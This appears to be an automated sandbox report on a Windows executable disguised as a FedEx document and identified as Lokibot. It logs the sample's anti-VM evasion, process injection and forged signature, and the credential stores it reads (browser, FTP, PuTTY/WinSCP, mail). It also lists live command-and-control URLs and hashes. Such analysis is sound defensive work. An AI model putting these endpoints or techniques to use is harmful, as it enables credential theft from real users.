Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: 12C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: 1410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: 8010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: 7640000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: 9010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Memory allocated: A010000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe TID: 6676	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe TID: 4024	Thread sleep time: -120000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_0040317B mov eax, dword ptr fs:[00000030h]

3_2_0040317B

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_00402B7C GetProcessHeap,RtlAllocateHeap,

3_2_00402B7C

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Memory written: C:\Users\user\Desktop\FedEx_776282383902.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Process created: C:\Users\user\Desktop\FedEx_776282383902.exe "C:\Users\user\Desktop\FedEx_776282383902.exe"

Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Queries volume information: C:\Users\user\Desktop\FedEx_776282383902.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FedEx_776282383902.exe PID: 6752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FedEx_776282383902.exe PID: 6192, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: PopPassword		3_2_0040D069
Source: C:\Users\user\Desktop\FedEx_776282383902.exe	Code function: SmtpPassword		3_2_0040D069

Source: Yara match	File source: 3.2.FedEx_776282383902.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.FedEx_776282383902.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42a0b10.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FedEx_776282383902.exe.42bab30.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218835843.00000000042BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1218365213.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
FedEx_776282383902.exe	66%	ReversingLabs	ByteCode-MSIL.Trojan.LokiBot
FedEx_776282383902.exe	100%	Avira	HEUR/AGEN.1357257
FedEx_776282383902.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
https://gmpg.org/xfn/11	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://45.61.137.215/index.php/feed/	100%	Avira URL Cloud	malware
http://45.61.137.215/index.php/comments/feed/	100%	Avira URL Cloud	malware
http://45.61.137.215/index.php/t?id=090	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
http://45.61.137.215/index.php/t?id=090	true	Avira URL Cloud: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.61.137.215/index.php/feed/	FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://gmpg.org/xfn/11	FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://45.61.137.215/index.php/comments/feed/	FedEx_776282383902.exe, 00000003.00000002.2466307984.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	FedEx_776282383902.exe	false	URL Reputation: safe	unknown
http://www.ibsensoftware.com/	FedEx_776282383902.exe, FedEx_776282383902.exe, 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.61.137.215	unknown	United States		40676	AS40676US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1446057
Start date and time:	2024-05-22 22:00:47 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FedEx_776282383902.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 78 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: FedEx_776282383902.exe

Simulations

Behavior and APIs

Time	Type	Description
16:01:36	API Interceptor	35x Sleep call for process: FedEx_776282383902.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.61.137.215	hgDQGUqtEg.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/3b1tenbkyj
	g1lrdXCX39.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/index?id=671120760852658
	gunzipped.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/modify?post=1
	FedEx Receipt_AWB# 102235506763.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090
	DHLAwb#82102199382.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/index?id=671120760852658
	TBHD77628238942.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/6790
	Dospecepotrazivanja_pdf.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/3b1tenbkyj
	RFQ#678903403.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215/index.php/t?id=090

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS40676US	dn7MMSZM9O.elf	Get hash	malicious	Unknown	Browse	206.201.59.139
	hgDQGUqtEg.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	g1lrdXCX39.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	N5fJpUN6DR.elf	Get hash	malicious	Mirai	Browse	192.154.214.57
	gunzipped.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	FedEx Receipt_AWB# 102235506763.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	DHLAwb#82102199382.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	TBHD77628238942.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215
	SecuriteInfo.com.Win32.BackdoorX-gen.12322.17143.exe	Get hash	malicious	XWorm	Browse	41.216.183.101
	Dospecepotrazivanja_pdf.exe	Get hash	malicious	Lokibot	Browse	45.61.137.215

Process:	C:\Users\user\Desktop\FedEx_776282383902.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\FedEx_776282383902.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\FedEx_776282383902.exe
File Type:	data
Category:	dropped
Size (bytes):	50
Entropy (8bit):	1.5212424590621707
Encrypted:	false
SSDEEP:	3:/lvlp:p
MD5:	C851BF93667BDD6310D56581D955C2AE
SHA1:	8FC5AEC1542BD7471BF815632863622EFE23A834
SHA-256:	3C1A3E1EF8840689F0C6EC14E22435FC79EBC3F8771B7CD230F784CC81AE431D
SHA-512:	D3D597D36DE0EE75AA44F4F8571E56DAD810E7E6C9839F5D5E6BB05846AB6E61FAF1E9530333BD6EC5AB04098AAE935A522DBD149D214A5971A7368E18C3C9B4
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.963823125421934
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FedEx_776282383902.exe
File size:	539'656 bytes
MD5:	d8754ead54bc3ccd3bb50e726362aef9
SHA1:	d5c8560b76bfbf841db72e06b311f1c0346b20a5
SHA256:	25c3b63be2ea8b26be5050a732146c6f611dc335a96f80860dec608ece37bc4e
SHA512:	b7fd0cafefe3e6a35d38ee8b5da5bbe2d193dfab2d42e5b32b22fb833cebb835bd5290c26ed5e96f54a36d2d4aeed97ef229847e43ef927e3b00167155a5270c
SSDEEP:	12288:w+YifTFYVONOtTf6uxbTBTxOSbqojamEUufjkR:whiRYIruxb9hajK
TLSH:	8BB423633398F22BD75885737069803A9FFB75952C54CBCD2DE211898BD2B2045F2BA7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.Kf..............0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	d4c0aa9a96d6aa80

Static PE Info

General

Entrypoint:	0x4810c6
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x664BFF43 [Tue May 21 01:56:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

